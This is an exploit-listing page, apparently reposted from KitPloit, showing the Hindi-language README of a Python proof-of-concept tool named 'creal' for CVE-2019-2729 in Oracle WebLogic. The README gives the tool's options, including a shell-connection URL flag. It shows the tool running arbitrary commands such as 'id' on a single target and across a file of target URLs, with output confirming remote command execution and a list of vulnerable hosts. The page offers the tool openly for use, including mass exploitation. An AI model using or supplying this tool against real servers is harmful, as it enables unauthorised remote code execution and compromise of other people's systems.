Sploitus

Exploit for CVE-2019-2729_creal

kitploit · 2026-08-28

Exploit Code

MARKDOWN65 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LUCHOANE-CVE-2019-2729_CREAL
# CVE-2019-2729 - creal

WebLogic पर CVE-2019-2729 का शोषण करने के लिए PoC

### शोषण उपयोग

root@kitploit:~
    
    
    python3 creal.py -h
    usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]
    
    optional arguments:
      -h, --help            show this help message and exit
      -u URL, --url URL     target url
      -f F, --file F        url file
      -c CMD, --command CMD
                            command
      -s SH, --shell SH     url to connect
    

#### एकल लक्ष्य का शोषण:

root@kitploit:~
    
    
    $ python3 creal.py -u http://IP:PORT -c id
    
     ____ ____  _____ ____  _
    /   _Y  __\/  __//  _ \/ \
    |  / |  \/||  \  | / \|| |
    |  \_|    /|  /_ | |-||| |_/\
    \____|_/\_\\____\\_/ \\\____/
                </coded by Luchoane>
    
    [++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
    
    uid=500(UID) gid=500(GID) groups=500(GROUP)
    

#### url सूची का शोषण

root@kitploit:~
    
    
    $ python3 creal.py -f list.txt -c id
    
     ____ ____  _____ ____  _
    /   _Y  __\/  __//  _ \/ \
    |  / |  \/||  \  | / \|| |
    |  \_|    /|  /_ | |-||| |_/\
    \____|_/\_\\____\\_/ \\\____/
                </coded by Luchoane>
    
    [++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
    
    uid=500(UID) gid=500(GID) groups=500(GROUP)
    
    [-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
    [!] There was an error connecting!
    
    --------------------------
    Vulnerable targets scanned:
    [+] http://xxx.xxx.xxx.xxx:xxxx